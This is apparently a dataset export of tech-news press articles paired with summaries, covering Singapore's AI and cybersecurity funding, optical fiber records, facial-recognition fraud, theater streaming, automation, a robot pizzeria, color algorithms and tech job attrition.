id
stringlengths
1
169
pr-title
stringlengths
2
190
pr-article
stringlengths
0
65k
pr-summary
stringlengths
47
4.27k
sc-title
stringclasses
2 values
sc-article
stringlengths
0
2.03M
sc-abstract
stringclasses
2 values
sc-section_names
sequencelengths
0
0
sc-sections
sequencelengths
0
0
sc-authors
sequencelengths
0
0
source
stringclasses
2 values
Topic
stringclasses
10 values
Citation
stringlengths
4
4.58k
Paper_URL
stringlengths
4
213
News_URL
stringlengths
4
119
pr-summary-and-article
stringlengths
49
66.1k
126
Singapore Launching $50 Million Program to Advance Research on AI, Cybersecurity
SINGAPORE - Singapore plans to invest $50 million in a program to support research on AI and cybersecurity for future communications structures, Deputy Prime Minister Heng Swee Keat announced on Tuesday. As part of the Future Communications Research & Development Programme, Singapore plans to set up new communications testbeds in 5G and beyond-5G, support technology development, and build up a local talent pool. 5G refers to the fifth generation of high-speed mobile internet that aims to provide faster data speeds and more bandwidth to carry growing levels of web traffic. Many new technologies, such as self-driving cars, are underpinned by rapid developments and global deployment of 5G networks. For its part, Singapore plans to have full island-wide standalone 5G coverage by 2025 . The program will "support AI and cybersecurity research for next-generation communications infrastructures," Heng said at the Asia Tech x Singapore conference . It will "support testbeds for innovative pilots, and provide scholarships for those seeking to pursue research in communications."
Singapore's Deputy Prime Minister Heng Swee Keat announced that the city-state intends to invest $50 million in research on artificial intelligence and cybersecurity for next-generation communication infrastructures. The goals of Singapore's Future Communications Research & Development Program include establishing communications testbeds for 5G and beyond-5G, supporting the development of new technologies, and cultivating local talent. The island-nation also will launch the Singapore Trade Data Exchange, a venue that will enable multiple stakeholders (logistics players, shippers, and buyers) to share data that will reportedly be encrypted and transmitted, without being stored. The Singapore Financial Data Exchange launched last year lets users sign in with their national digital identity to access their consolidated financial data from enrolled banks and pertinent government agencies.
[]
[]
[]
scitechnews
None
None
None
None
Singapore's Deputy Prime Minister Heng Swee Keat announced that the city-state intends to invest $50 million in research on artificial intelligence and cybersecurity for next-generation communication infrastructures. The goals of Singapore's Future Communications Research & Development Program include establishing communications testbeds for 5G and beyond-5G, supporting the development of new technologies, and cultivating local talent. The island-nation also will launch the Singapore Trade Data Exchange, a venue that will enable multiple stakeholders (logistics players, shippers, and buyers) to share data that will reportedly be encrypted and transmitted, without being stored. The Singapore Financial Data Exchange launched last year lets users sign in with their national digital identity to access their consolidated financial data from enrolled banks and pertinent government agencies. SINGAPORE - Singapore plans to invest $50 million in a program to support research on AI and cybersecurity for future communications structures, Deputy Prime Minister Heng Swee Keat announced on Tuesday. As part of the Future Communications Research & Development Programme, Singapore plans to set up new communications testbeds in 5G and beyond-5G, support technology development, and build up a local talent pool. 5G refers to the fifth generation of high-speed mobile internet that aims to provide faster data speeds and more bandwidth to carry growing levels of web traffic. Many new technologies, such as self-driving cars, are underpinned by rapid developments and global deployment of 5G networks. For its part, Singapore plans to have full island-wide standalone 5G coverage by 2025 . The program will "support AI and cybersecurity research for next-generation communications infrastructures," Heng said at the Asia Tech x Singapore conference . It will "support testbeds for innovative pilots, and provide scholarships for those seeking to pursue research in communications."
127
Demonstration of World Record: 319 Tb/s Transmission Over 3,001 km with 4-Core Optical Fiber
New optical fiber Currently, standard single-core single-mode fiber, which is widely used for medium- and long-distance communication, is considered to have a capacity limit of about 100 terabits per second in the conventional C- and L-bands and 200-300 terabits per second if adopting additional bands. In order to further increase transmission capacity, research on multi-core fibers with more cores (light paths) and multi-mode fibers has been performed extensively in recent years.
Researchers at Japan's National Institute of Information and Communications Technology (NICT) successfully conducted the first S-, C-, and L-band transmission over a world-record 3,001 kilometers (1,864.7 miles) using a 4-core optical fiber. The combined 20-nanometer-plus transmission bandwidth supported 552 wavelength-division multiplexed channels by adopting two classes of doped-fiber amplifier in conjunction with distributed Raman amplification to facilitate the wideband signal's recirculating transmission. Standard cladding diameter allows the cabling of 4-core optical fiber to be integrated with existing gear. The NICT researchers hope this will yield practical high data-rate transmission, and help to realize a backbone communications infrastructure that supports data services beyond the capabilities of 5G.
[]
[]
[]
scitechnews
None
None
None
None
Researchers at Japan's National Institute of Information and Communications Technology (NICT) successfully conducted the first S-, C-, and L-band transmission over a world-record 3,001 kilometers (1,864.7 miles) using a 4-core optical fiber. The combined 20-nanometer-plus transmission bandwidth supported 552 wavelength-division multiplexed channels by adopting two classes of doped-fiber amplifier in conjunction with distributed Raman amplification to facilitate the wideband signal's recirculating transmission. Standard cladding diameter allows the cabling of 4-core optical fiber to be integrated with existing gear. The NICT researchers hope this will yield practical high data-rate transmission, and help to realize a backbone communications infrastructure that supports data services beyond the capabilities of 5G. New optical fiber Currently, standard single-core single-mode fiber, which is widely used for medium- and long-distance communication, is considered to have a capacity limit of about 100 terabits per second in the conventional C- and L-bands and 200-300 terabits per second if adopting additional bands. In order to further increase transmission capacity, research on multi-core fibers with more cores (light paths) and multi-mode fibers has been performed extensively in recent years.
128
Faces Are the Next Target for Fraudsters
The Future of Everything covers the innovation and technology transforming the way we live, work and play, with monthly issues on health , money , cities and more. This month is Artificial Intelligence , online starting July 2 and in the paper on July 9. Facial-recognition systems , long touted as a quick and dependable way to identify everyone from employees to hotel guests, are in the crosshairs of fraudsters. For years, researchers have warned about the technology's vulnerabilities , but recent schemes have confirmed their fears - and underscored the difficult but necessary task of improving the systems.
Facial recognition systems increasingly are a target for fraudsters. Identity verification company ID.me Inc. found more than 80,000 attempts to trick facial identification verification to claim fraudulent unemployment benefits between June 2020 and January 2021. ID.me's Blake Hall said these attempts involved people wearing masks, using deepfakes, or holding up images or videos of other people. Veridium LLC's John Spencer said fraudsters sometimes try to carry out "presentation attacks" by using a photo of someone's face, cutting out the eyes and using it as a mask. Adversa.ai's Alex Polyakov said the algorithms underpinning these systems need to be updated, or the models need to be trained with a large number of adversarial examples, to protect against such spoofing.
[]
[]
[]
scitechnews
None
None
None
None
Facial recognition systems increasingly are a target for fraudsters. Identity verification company ID.me Inc. found more than 80,000 attempts to trick facial identification verification to claim fraudulent unemployment benefits between June 2020 and January 2021. ID.me's Blake Hall said these attempts involved people wearing masks, using deepfakes, or holding up images or videos of other people. Veridium LLC's John Spencer said fraudsters sometimes try to carry out "presentation attacks" by using a photo of someone's face, cutting out the eyes and using it as a mask. Adversa.ai's Alex Polyakov said the algorithms underpinning these systems need to be updated, or the models need to be trained with a large number of adversarial examples, to protect against such spoofing. The Future of Everything covers the innovation and technology transforming the way we live, work and play, with monthly issues on health , money , cities and more. This month is Artificial Intelligence , online starting July 2 and in the paper on July 9. Facial-recognition systems , long touted as a quick and dependable way to identify everyone from employees to hotel guests, are in the crosshairs of fraudsters. For years, researchers have warned about the technology's vulnerabilities , but recent schemes have confirmed their fears - and underscored the difficult but necessary task of improving the systems.
129
Technology Brings Interest, Crowds to 'Closed' Theaters
For many people involved in the theater, the past year has been difficult. For others, coronavirus closures have provided new opportunities using technology. Britain's Royal Shakespeare Company is one example. Even before COVID-19 restrictions closed theaters, the company had shared recorded performances as movies. This helped people who could not get to London or New York City to see the live shows. The pandemic has turned even the smallest theaters into producers of streamed programs. These are available on the internet outside of their local communities. For some theater lovers, a screen cannot replace a live performance. But some observers predict that online theater is here to stay. And a generation that has grown up with computers and mobile phones might like it better than live theater. The Royal Shakespeare Company, or RSC, has said it is combining online media skills with traditional art. Mixed reality productions let actors work with digital versions of 16th century writer William Shakespeare's more unusual characters . And digital events have invited people worldwide to add to the action from their computers. Sarah Ellis is director of digital development at the RSC. She told Reuters news agency that the company is doing its research and development right now. "If we look at what the pandemic did," it broke open the future, she said. Ellis noted that digital tools have helped reach a lot of people around the world and this creates many possibilities. Public opinion research by the RSC during the coronavirus health crisis found that people were willing to pay for digital performances. And people said they were willing to watch the shows online even when theaters reopened. Magical switcher Theaters work hard to bring to life the tension of a story on stage . That used to mean employing costly technical crews. But a few months before the pandemic brought restrictions, a valuable piece of equipment became available. The device is known as a switcher. One switcher causing excitement right now is the ATEM Mini. It costs just $295. This switcher is produced by Blackmagic Design, an Australian company that has worked with the RSC. Blackmagic has also provided technology for the movie "Avatar" and the series "Game of Thrones." The device lets a video recording switch between up to four different cameras. That means a single performance can have the many different camera angles seen in movies and television shows. It also permits quick editing , so performances can be shared quickly online. Blackmagic founder Grant Petty said he wanted to help creative people by providing easy-to-use technology. He said when he first got into the industry, businesspeople were controlling everything. Creative people were being excluded from decision-making. "I just felt that was wrong," he said, adding, if the equipment was less costly, it would "empower creative people." Rising from the ruins Theatre Charlotte is a small theater that has used the switcher. It has streamed shows to people across the United States and Canada. It is North Carolina's longest continually producing community theater. But a fire last year damaged its 80-year-old headquarters. Acting Executive Director Chris Timmons said the company has rediscovered that theater is more than just a building. He expects to keep streaming even after Theatre Charlotte rebuilds next year. And he said he can imagine a younger generation less interested in the traditions of pre-performance dinners and after-show drinks. Timmons said there is surely room for both kinds of crowds. Colvin Theater is a theater production group based in Grand Rapids, Michigan. Founder Cody Colvin says many productions lose money even when the economy is good and streaming can help that. "We're going to hit a point where selling tickets is not going to pay the bills anymore," he said. Theater will become like sports and humor shows, where there will be a live crowd paying a lot of money to go to the event, he said. And then it will be broadcast online for people who want to pay less. He said that is the only way to grow. The live experience will still be hard to beat, however. Neil Darlison is director of theater at Arts Council England, a government arts agency in Britain. He said the council supports the use of digital tools to reach more people. But the desire for live theater is still strong. Darlison said he does not think streaming is going to be as much of a problem for live theater as it may be for films or music shows. What sets theater apart is "the collective experience," he said, which is much harder to reproduce digitally. I'm Alice Bryant. opportunity -n. an amount of time or a situation in which something can be done; a chance to do or gain something stream -v. to play continuously as data is sent to a computer over the internet screen -n. the flat part of a television or computer that shows images or text digital -adj. using computer technology; created through electronic devices, not physically real character -n. a person or being who appears in a story, book, play, movie or television show stage -n. a raised structure in a theater or similar building where performers stand angle -n. the position from which something is looked at; for example, a camera angle edit -v. to prepare a film, recording, photography or other work by changing, moving or removing parts bill -n. a document stating how much is owed for goods or services
Britain's Royal Shakespeare Company (RSC) is an example of how theaters closed by the coronavirus pandemic have adopted technology to support new forms of performance art. The company said it is combining online media skills with traditional art to create mixed-reality productions, and inviting people to participate virtually in its digital events. The RSC's Sarah Ellis said the global nature of digital tools offers many possibilities. Public opinion research has shown people were willing to pay for digital performances during the pandemic, and would continue watching such productions online after theaters reopened. Cody Colvin with the Michigan-based Colvin Theater production group anticipates streaming will be essential to theaters that lose money on productions even when the economy is good.
[]
[]
[]
scitechnews
None
None
None
None
Britain's Royal Shakespeare Company (RSC) is an example of how theaters closed by the coronavirus pandemic have adopted technology to support new forms of performance art. The company said it is combining online media skills with traditional art to create mixed-reality productions, and inviting people to participate virtually in its digital events. The RSC's Sarah Ellis said the global nature of digital tools offers many possibilities. Public opinion research has shown people were willing to pay for digital performances during the pandemic, and would continue watching such productions online after theaters reopened. Cody Colvin with the Michigan-based Colvin Theater production group anticipates streaming will be essential to theaters that lose money on productions even when the economy is good. For many people involved in the theater, the past year has been difficult. For others, coronavirus closures have provided new opportunities using technology. Britain's Royal Shakespeare Company is one example. Even before COVID-19 restrictions closed theaters, the company had shared recorded performances as movies. This helped people who could not get to London or New York City to see the live shows. The pandemic has turned even the smallest theaters into producers of streamed programs. These are available on the internet outside of their local communities. For some theater lovers, a screen cannot replace a live performance. But some observers predict that online theater is here to stay. And a generation that has grown up with computers and mobile phones might like it better than live theater. The Royal Shakespeare Company, or RSC, has said it is combining online media skills with traditional art. Mixed reality productions let actors work with digital versions of 16th century writer William Shakespeare's more unusual characters . And digital events have invited people worldwide to add to the action from their computers. Sarah Ellis is director of digital development at the RSC. She told Reuters news agency that the company is doing its research and development right now. "If we look at what the pandemic did," it broke open the future, she said. Ellis noted that digital tools have helped reach a lot of people around the world and this creates many possibilities. Public opinion research by the RSC during the coronavirus health crisis found that people were willing to pay for digital performances. And people said they were willing to watch the shows online even when theaters reopened. Magical switcher Theaters work hard to bring to life the tension of a story on stage . That used to mean employing costly technical crews. But a few months before the pandemic brought restrictions, a valuable piece of equipment became available. The device is known as a switcher. One switcher causing excitement right now is the ATEM Mini. It costs just $295. This switcher is produced by Blackmagic Design, an Australian company that has worked with the RSC. Blackmagic has also provided technology for the movie "Avatar" and the series "Game of Thrones." The device lets a video recording switch between up to four different cameras. That means a single performance can have the many different camera angles seen in movies and television shows. It also permits quick editing , so performances can be shared quickly online. Blackmagic founder Grant Petty said he wanted to help creative people by providing easy-to-use technology. He said when he first got into the industry, businesspeople were controlling everything. Creative people were being excluded from decision-making. "I just felt that was wrong," he said, adding, if the equipment was less costly, it would "empower creative people." Rising from the ruins Theatre Charlotte is a small theater that has used the switcher. It has streamed shows to people across the United States and Canada. It is North Carolina's longest continually producing community theater. But a fire last year damaged its 80-year-old headquarters. Acting Executive Director Chris Timmons said the company has rediscovered that theater is more than just a building. He expects to keep streaming even after Theatre Charlotte rebuilds next year. And he said he can imagine a younger generation less interested in the traditions of pre-performance dinners and after-show drinks. Timmons said there is surely room for both kinds of crowds. Colvin Theater is a theater production group based in Grand Rapids, Michigan. Founder Cody Colvin says many productions lose money even when the economy is good and streaming can help that. "We're going to hit a point where selling tickets is not going to pay the bills anymore," he said. Theater will become like sports and humor shows, where there will be a live crowd paying a lot of money to go to the event, he said. And then it will be broadcast online for people who want to pay less. He said that is the only way to grow. The live experience will still be hard to beat, however. Neil Darlison is director of theater at Arts Council England, a government arts agency in Britain. He said the council supports the use of digital tools to reach more people. But the desire for live theater is still strong. Darlison said he does not think streaming is going to be as much of a problem for live theater as it may be for films or music shows. What sets theater apart is "the collective experience," he said, which is much harder to reproduce digitally. I'm Alice Bryant. opportunity -n. an amount of time or a situation in which something can be done; a chance to do or gain something stream -v. to play continuously as data is sent to a computer over the internet screen -n. the flat part of a television or computer that shows images or text digital -adj. using computer technology; created through electronic devices, not physically real character -n. a person or being who appears in a story, book, play, movie or television show stage -n. a raised structure in a theater or similar building where performers stand angle -n. the position from which something is looked at; for example, a camera angle edit -v. to prepare a film, recording, photography or other work by changing, moving or removing parts bill -n. a document stating how much is owed for goods or services
131
WHO Releases AI Guidelines for Health
A new report from the World Health Organization (WHO) offers guidance for the ethical use of artificial intelligence (AI) in the health sector. The six primary principles for the use of AI as set forth in the report are to protect autonomy; promote human well-being, safety, and the public interest; ensure transparency, explainability, and intelligibility; foster responsibility and accountability; ensure inclusiveness and equity; and promote responsive and sustainable AI. These principles are intended as a foundation for AI stakeholders, including governments, developers, and society. The report,
[]
[]
[]
scitechnews
None
None
None
None
A new report from the World Health Organization (WHO) offers guidance for the ethical use of artificial intelligence (AI) in the health sector. The six primary principles for the use of AI as set forth in the report are to protect autonomy; promote human well-being, safety, and the public interest; ensure transparency, explainability, and intelligibility; foster responsibility and accountability; ensure inclusiveness and equity; and promote responsive and sustainable AI. These principles are intended as a foundation for AI stakeholders, including governments, developers, and society. The report,
132
Pandemic Wave of Automation May Be Bad News for Workers
Technological investments that were made in response to the crisis may contribute to a post-pandemic productivity boom, allowing for higher wages and faster growth. But some economists say the latest wave of automation could eliminate jobs and erode bargaining power, particularly for the lowest-paid workers, in a lasting way. "Once a job is automated, it's pretty hard to turn back," said Casey Warman, an economist at Dalhousie University in Nova Scotia who has studied automation in the pandemic . The trend toward automation predates the pandemic, but it has accelerated at what is proving to be a critical moment. The rapid reopening of the economy has led to a surge in demand for waiters, hotel maids, retail sales clerks and other workers in service industries that had cut their staffs. At the same time, government benefits have allowed many people to be selective in the jobs they take. Together, those forces have given low-wage workers a rare moment of leverage , leading to higher pay , more generous benefits and other perks. Automation threatens to tip the advantage back toward employers, potentially eroding those gains. A working paper published by the International Monetary Fund this year predicted that pandemic-induced automation would increase inequality in coming years, not just in the United States but around the world. "Six months ago, all these workers were essential," said Marc Perrone, president of the United Food and Commercial Workers, a union representing grocery workers. "Everyone was calling them heroes. Now, they're trying to figure out how to get rid of them."
Some economists are warning that an acceleration of the pandemic-driven adoption of automation could eliminate jobs and permanently erode bargaining power, especially for the lowest-paid workers. An Atlanta-based Checkers fast-food franchise, for example, contracted with Colorado startup Valyant AI to deploy automated voice ordering at its drive-through. The economic reopening has caused demand for service-industry workers to surge, and low-wage workers can negotiate higher pay and better benefits. However, a study by Massachusetts Institute of Technology researchers found that the pandemic has almost certainly exacerbated U.S. wage inequality, a trend that automation has been fueling over the last 40 years.
[]
[]
[]
scitechnews
None
None
None
None
Some economists are warning that an acceleration of the pandemic-driven adoption of automation could eliminate jobs and permanently erode bargaining power, especially for the lowest-paid workers. An Atlanta-based Checkers fast-food franchise, for example, contracted with Colorado startup Valyant AI to deploy automated voice ordering at its drive-through. The economic reopening has caused demand for service-industry workers to surge, and low-wage workers can negotiate higher pay and better benefits. However, a study by Massachusetts Institute of Technology researchers found that the pandemic has almost certainly exacerbated U.S. wage inequality, a trend that automation has been fueling over the last 40 years. Technological investments that were made in response to the crisis may contribute to a post-pandemic productivity boom, allowing for higher wages and faster growth. But some economists say the latest wave of automation could eliminate jobs and erode bargaining power, particularly for the lowest-paid workers, in a lasting way. "Once a job is automated, it's pretty hard to turn back," said Casey Warman, an economist at Dalhousie University in Nova Scotia who has studied automation in the pandemic . The trend toward automation predates the pandemic, but it has accelerated at what is proving to be a critical moment. The rapid reopening of the economy has led to a surge in demand for waiters, hotel maids, retail sales clerks and other workers in service industries that had cut their staffs. At the same time, government benefits have allowed many people to be selective in the jobs they take. Together, those forces have given low-wage workers a rare moment of leverage , leading to higher pay , more generous benefits and other perks. Automation threatens to tip the advantage back toward employers, potentially eroding those gains. A working paper published by the International Monetary Fund this year predicted that pandemic-induced automation would increase inequality in coming years, not just in the United States but around the world. "Six months ago, all these workers were essential," said Marc Perrone, president of the United Food and Commercial Workers, a union representing grocery workers. "Everyone was calling them heroes. Now, they're trying to figure out how to get rid of them."
133
Paris Welcomes First Pizzeria Operated by Robots
Pazzi, the first fully robotic pizzeria, has opened in Paris' Beaubourg neighborhood after eight years of development and refinement. Pazzi's robot staff oversees all aspects of pizza preparation, from taking orders to prepping the dough to boxing the pizzas. Pazzi's Thierry Graffagnino said because pizza dough is particularly challenging to handle, "We had to give the robot the means to make these corrections on its own, and some pizza makers can't even manage that themselves." Said Pazzi robot co-inventor Sebastien Roverso, "We are in a very fast process, with a perfect control of time, a control of quality since we have a constancy offered by robotics, and then an environment that is quite cool and relaxed. The idea is also to spend a few pleasant minutes watching the robot while you wait for your pizza to be made."
[]
[]
[]
scitechnews
None
None
None
None
Pazzi, the first fully robotic pizzeria, has opened in Paris' Beaubourg neighborhood after eight years of development and refinement. Pazzi's robot staff oversees all aspects of pizza preparation, from taking orders to prepping the dough to boxing the pizzas. Pazzi's Thierry Graffagnino said because pizza dough is particularly challenging to handle, "We had to give the robot the means to make these corrections on its own, and some pizza makers can't even manage that themselves." Said Pazzi robot co-inventor Sebastien Roverso, "We are in a very fast process, with a perfect control of time, a control of quality since we have a constancy offered by robotics, and then an environment that is quite cool and relaxed. The idea is also to spend a few pleasant minutes watching the robot while you wait for your pizza to be made."
134
Algorithms Give Digital Images More Realistic Color
1 July 2021 Method could help improve color for electronic displays and create more natural LED lighting WASHINGTON - If you've ever tried to capture a sunset with your smartphone, you know that the colors don't always match what you see in real life. Researchers are coming closer to solving this problem with a new set of algorithms that make it possible to record and display color in digital images in a much more realistic fashion. "When we see a beautiful scene, we want to record it and share it with others," said Min Qiu, leader of the Laboratory of Photonics and Instrumentation for Nano Technology (PAINT) at Westlake University in China. "But we don't want to see a digital photo or video with the wrong colors. Our new algorithms can help digital camera and electronic display developers better adapt their devices to our eyes." Caption: The new approach for digitizing color can be applied to cameras, displays and LED lighting. Because the color space studied isn't device dependent, the same values should be perceived as the same color even if different devices are used. Pictured is a corner of the optical setup built by the researchers. Credit: Min Qiu's PAINT research group, Westlake University In Optica , The Optical Society's ( OSA ) journal for high impact research, Qiu and colleagues describe a new approach for digitizing color. It can be applied to cameras and displays - including ones used for computers, televisions and mobile devices - and used to fine-tune the color of LED lighting. "Our new approach can improve today's commercially available displays or enhance the sense of reality for new technologies such as near-eye-displays for virtual reality and augmented reality glasses," said Jiyong Wang, a member of the PAINT research team. "It can also be used to produce LED lighting for hospitals, tunnels, submarines and airplanes that precisely mimics natural sunlight. This can help regulate circadian rhythm in people who are lacking sun exposure, for example." Mixing digital color Digital colors such as the ones on a television or smartphone screen are typically created by combining red, green and blue (RGB), with each color assigned a value. For example, an RGB value of (255, 0, 0) represents pure red. The RGB value reflects a relative mixing ratio of three primary lights produced by an electronic device. However, not all devices produce this primary light in the same way, which means that identical RGB coordinates can look like different colors on different devices. There are also other ways, or color spaces, used to define colors such as hue, saturation, value (HSV) or cyan, magenta, yellow and black (CMYK). To make it possible to compare colors in different color spaces, the International Commission on Illumination (CIE) issued standards for defining colors visible to humans based on the optical responses of our eyes. Applying these standards requires scientists and engineers to convert digital, computer-based color spaces such as RGB to CIE-based color spaces when designing and calibrating their electronic devices. In the new work, the researchers developed algorithms that directly correlate digital signals with the colors in a standard CIE color space, making color space conversions unnecessary. Colors, as defined by the CIE standards, are created through additive color mixing. This process involves calculating the CIE values for the primary lights driven by digital signals and then mixing those together to create the color. To encode colors based on the CIE standards, the algorithms convert the digital pulsed signals for each primary color into unique coordinates for the CIE color space. To decode the colors, another algorithm extracts the digital signals from an expected color in the CIE color space. "Our new method maps the digital signals directly to a CIE color space," said Wang. "Because such color space isn't device dependent, the same values should be perceived as the same color even if different devices are used. Our algorithms also allow other important properties of color such as brightness and chromaticity to be treated independently and precisely." Caption: Researchers developed algorithms that correlate digital signals with colors in a standard CIE color space. The video shows how various colors are created in the CIE 1931 chromatic diagram by mixing three colors of light. Credit: Min Qiu's PAINT research group, Westlake University Creating precise colors The researchers tested their new algorithms with lighting, display and sensing applications that involved LEDs and lasers. Their results agreed very well with their expectations and calculations. For example, they showed that chromaticity, which is a measure of colorfulness independent of brightness, could be controlled with a deviation of just ~0.0001 for LEDs and 0.001 for lasers. These values are so small that most people would not be able to perceive any differences in color. The researchers say that the method is ready to be applied to LED lights and commercially available displays. However, achieving the ultimate goal of reproducing exactly what we see with our eyes will require solving additional scientific and technical problems. For example, to record a scene as we see it, color sensors in a digital camera would need to respond to light in the same way as the photoreceptors in our eyes. To further build on their work, the researchers are using state-of-art nanotechnologies to enhance the sensitivity of color sensors. This could be applied for artificial vision technologies to help people who have color blindness, for example. Paper : N. Tang, L. Zhang, J. Zhou, J. Yu, B. Chen, Y. Peng, X. Tian, W. Yan, J. Wang and M. Qiu, "Nonlinear Color Space Coded by Additive Digital Pulses," Optica , 8, 7, 977-983 (2021). DOI: https://doi.org/10.1364/OPTICA.422287 . About Optica Optica is an open-access journal dedicated to the rapid dissemination of high-impact peer-reviewed research across the entire spectrum of optics and photonics. Published monthly by The Optical Society (OSA), Optica provides a forum for pioneering research to be swiftly accessed by the international community, whether that research is theoretical or experimental, fundamental or applied. Optica maintains a distinguished editorial board of more than 60 associate editors from around the world and is overseen by Editor-in-Chief Prem Kumar, Northwestern University, USA. For more information, visit Optica . About The Optical Society The Optical Society (OSA) is dedicated to promoting the generation, application, archiving, and dissemination of knowledge in optics and photonics worldwide. Founded in 1916, it is the leading organization for scientists, engineers, business professionals, students, and others interested in the science of light. OSA's renowned publications, meetings, online resources, and in-person activities fuel discoveries, shape real-life applications and accelerate scientific, technical, and educational achievement. Media Contact Aaron Cohen (301) 633-6773 [email protected] [email protected]
New algorithms can facilitate the capture and display of digital images with more realistic color, thanks to engineers at the Laboratory of Photonics and Instrumentation for Nano Technology (PAINT) at China's Westlake University. The algorithms eliminate color space conversions by directly correlating digital signals with the colors in a standard International Commission on Illumination color space. One program renders the digital pulsed signals for each primary color as unique coordinates for the color space; another algorithm decodes the colors by extracting the digital signals from an expected color in the color space. Said PAINT's Jiyong Wang, "Our algorithms also allow other important properties of color, such as brightness and chromaticity, to be treated independently and precisely."
[]
[]
[]
scitechnews
None
None
None
None
New algorithms can facilitate the capture and display of digital images with more realistic color, thanks to engineers at the Laboratory of Photonics and Instrumentation for Nano Technology (PAINT) at China's Westlake University. The algorithms eliminate color space conversions by directly correlating digital signals with the colors in a standard International Commission on Illumination color space. One program renders the digital pulsed signals for each primary color as unique coordinates for the color space; another algorithm decodes the colors by extracting the digital signals from an expected color in the color space. Said PAINT's Jiyong Wang, "Our algorithms also allow other important properties of color, such as brightness and chromaticity, to be treated independently and precisely." 1 July 2021 Method could help improve color for electronic displays and create more natural LED lighting WASHINGTON - If you've ever tried to capture a sunset with your smartphone, you know that the colors don't always match what you see in real life. Researchers are coming closer to solving this problem with a new set of algorithms that make it possible to record and display color in digital images in a much more realistic fashion. "When we see a beautiful scene, we want to record it and share it with others," said Min Qiu, leader of the Laboratory of Photonics and Instrumentation for Nano Technology (PAINT) at Westlake University in China. "But we don't want to see a digital photo or video with the wrong colors. Our new algorithms can help digital camera and electronic display developers better adapt their devices to our eyes." Caption: The new approach for digitizing color can be applied to cameras, displays and LED lighting. Because the color space studied isn't device dependent, the same values should be perceived as the same color even if different devices are used. Pictured is a corner of the optical setup built by the researchers. Credit: Min Qiu's PAINT research group, Westlake University In Optica , The Optical Society's ( OSA ) journal for high impact research, Qiu and colleagues describe a new approach for digitizing color. It can be applied to cameras and displays - including ones used for computers, televisions and mobile devices - and used to fine-tune the color of LED lighting. "Our new approach can improve today's commercially available displays or enhance the sense of reality for new technologies such as near-eye-displays for virtual reality and augmented reality glasses," said Jiyong Wang, a member of the PAINT research team. "It can also be used to produce LED lighting for hospitals, tunnels, submarines and airplanes that precisely mimics natural sunlight. This can help regulate circadian rhythm in people who are lacking sun exposure, for example." Mixing digital color Digital colors such as the ones on a television or smartphone screen are typically created by combining red, green and blue (RGB), with each color assigned a value. For example, an RGB value of (255, 0, 0) represents pure red. The RGB value reflects a relative mixing ratio of three primary lights produced by an electronic device. However, not all devices produce this primary light in the same way, which means that identical RGB coordinates can look like different colors on different devices. There are also other ways, or color spaces, used to define colors such as hue, saturation, value (HSV) or cyan, magenta, yellow and black (CMYK). To make it possible to compare colors in different color spaces, the International Commission on Illumination (CIE) issued standards for defining colors visible to humans based on the optical responses of our eyes. Applying these standards requires scientists and engineers to convert digital, computer-based color spaces such as RGB to CIE-based color spaces when designing and calibrating their electronic devices. In the new work, the researchers developed algorithms that directly correlate digital signals with the colors in a standard CIE color space, making color space conversions unnecessary. Colors, as defined by the CIE standards, are created through additive color mixing. This process involves calculating the CIE values for the primary lights driven by digital signals and then mixing those together to create the color. To encode colors based on the CIE standards, the algorithms convert the digital pulsed signals for each primary color into unique coordinates for the CIE color space. To decode the colors, another algorithm extracts the digital signals from an expected color in the CIE color space. "Our new method maps the digital signals directly to a CIE color space," said Wang. "Because such color space isn't device dependent, the same values should be perceived as the same color even if different devices are used. Our algorithms also allow other important properties of color such as brightness and chromaticity to be treated independently and precisely." Caption: Researchers developed algorithms that correlate digital signals with colors in a standard CIE color space. The video shows how various colors are created in the CIE 1931 chromatic diagram by mixing three colors of light. Credit: Min Qiu's PAINT research group, Westlake University Creating precise colors The researchers tested their new algorithms with lighting, display and sensing applications that involved LEDs and lasers. Their results agreed very well with their expectations and calculations. For example, they showed that chromaticity, which is a measure of colorfulness independent of brightness, could be controlled with a deviation of just ~0.0001 for LEDs and 0.001 for lasers. These values are so small that most people would not be able to perceive any differences in color. The researchers say that the method is ready to be applied to LED lights and commercially available displays. However, achieving the ultimate goal of reproducing exactly what we see with our eyes will require solving additional scientific and technical problems. For example, to record a scene as we see it, color sensors in a digital camera would need to respond to light in the same way as the photoreceptors in our eyes. To further build on their work, the researchers are using state-of-art nanotechnologies to enhance the sensitivity of color sensors. This could be applied for artificial vision technologies to help people who have color blindness, for example. Paper : N. Tang, L. Zhang, J. Zhou, J. Yu, B. Chen, Y. Peng, X. Tian, W. Yan, J. Wang and M. Qiu, "Nonlinear Color Space Coded by Additive Digital Pulses," Optica , 8, 7, 977-983 (2021). DOI: https://doi.org/10.1364/OPTICA.422287 . About Optica Optica is an open-access journal dedicated to the rapid dissemination of high-impact peer-reviewed research across the entire spectrum of optics and photonics. Published monthly by The Optical Society (OSA), Optica provides a forum for pioneering research to be swiftly accessed by the international community, whether that research is theoretical or experimental, fundamental or applied. Optica maintains a distinguished editorial board of more than 60 associate editors from around the world and is overseen by Editor-in-Chief Prem Kumar, Northwestern University, USA. For more information, visit Optica . About The Optical Society The Optical Society (OSA) is dedicated to promoting the generation, application, archiving, and dissemination of knowledge in optics and photonics worldwide. Founded in 1916, it is the leading organization for scientists, engineers, business professionals, students, and others interested in the science of light. OSA's renowned publications, meetings, online resources, and in-person activities fuel discoveries, shape real-life applications and accelerate scientific, technical, and educational achievement. Media Contact Aaron Cohen (301) 633-6773 [email protected] [email protected]
135
Tech Workers Are Preparing to Quit. Persuading Them to Stay Won't Be Easy
New research suggests that less than a third of tech workers plan to stay on in their current role - leaving organizations facing an exodus of digital skills as they emerge from the pandemic. A survey of 1,000 technology workers and 500 IT decision makers by careers platform CWJobs found that just 29% of employees intend on staying with their current employer for the next 12 months, with the majority planning to make career or lifestyle changes as life opens up again. CWJob's research found that 14% of tech workers would look for a new role at a different company, with others planning to establish their own business (11%), go part-time (11%), change locations (11%) or become a contractor (10%). Eight percent are contemplating leaving tech altogether. SEE: Best Microsoft technical certifications in 2021: Top exams CWJob's study offers yet another indicator that employers face a skills shortage in the coming months as employees make post-pandemic career moves. Tech departments were called upon to keep organizations moving forward as COVID-19 upended traditional businesses models and brought about the need for radical new ways of working. Developers and IT professionals bore the brunt of this, tasked with maintaining business continuity, introducing new digital services and navigating the industry-wide adoption of remote work in the space of a few short weeks. But as lockdown restrictions ease and organizations draw up their plans for the coming months, employers face what has been dubbed 'The Great Resignation' as employees - who have spent the past 16 months reflecting on their personal and professional priorities - prepare to move on. Research by HR software company Personio in May found that 38% of workers in the UK & Ireland plan to change roles in the next 6-12 months, rising to 58% amongst those in IT and computing 